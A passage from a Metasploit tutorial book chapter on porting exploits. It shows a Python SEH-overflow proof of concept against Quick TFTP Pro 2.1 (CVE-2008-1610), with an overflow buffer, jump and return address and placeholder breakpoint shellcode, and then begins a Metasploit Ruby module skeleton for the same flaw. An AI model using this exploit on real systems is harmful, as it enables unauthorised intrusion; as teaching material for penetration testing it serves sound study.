Porting Exploits to the Metasploit Framework
227
print "[*] Quick TFTP Pro 2.1 SEH Overflow (0day)"
print "[*] http://www.offensive-security.com"
host = '127.0.0.1'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = "pwnd"
shell = "\xcc" * 317
mode = "A"*1019+"\xeb\x08\x90\x90"+"\x58\x14\xd3\x74"+"\x90"*16+shell
muha = "\x00\x02" + filename+ "\0" + mode + "\0"
print "[*] Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print "[*] Check port 4444 for bindshell"
As we did with our previous JMP ESP example, we first create a skeleton for
our new module by using a base example of an exploit similar to the one we used
previously:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Quick TFTP Pro 2.1 Long Mode Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Quick TFTP Pro 2.1.
},
'Author' => 'Your Name',
'Version' => '$Revision: 7724 $',
'References' =>
[
['CVE', '2008-1610'],
['OSVDB', '43784'],
['URL', 'http://www.exploit-db.com/exploits/5315'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},